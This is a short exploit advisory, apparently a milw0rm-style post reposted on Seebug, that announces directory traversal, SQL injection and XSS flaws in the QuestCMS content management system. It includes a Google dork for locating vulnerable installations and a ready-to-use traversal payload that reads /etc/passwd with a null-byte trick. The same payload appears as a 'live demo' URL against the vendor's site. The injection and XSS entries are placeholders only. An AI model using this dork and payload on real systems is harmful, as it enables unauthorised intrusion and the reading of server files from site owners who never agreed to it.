-------------------------------------------------------------------------------- Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql] -------------------------------------------------------------------------------- #Author: d3b4g #contact: bl4ckend[at]gmail[dot]com -------------------------------------------------------------------------------- Affected software: -------------------------------------------------------------------------------- Application : Questwork Web Content Management system (QuestCMS) URL : http://www.questwork.com -------------------------------------------------------------------------------- dork : allinurl:"/questcms/" -------------------------------------------------------------------------------- Directory traversal vulnibility ============================= Exploit : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html Live demo : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html --------------------------------------------------------------------------------- sql injection: ============== Vuln file:questcms/main/main.php?obj=[sql] XSS: ==== exploit:/main/main.php?cx=[Xss] -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- greetz: All my friends,milw0rm... -------------------------------------------------------------------------------- --------------------------------- [ www.hotlism.org ] --------------------------------------
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论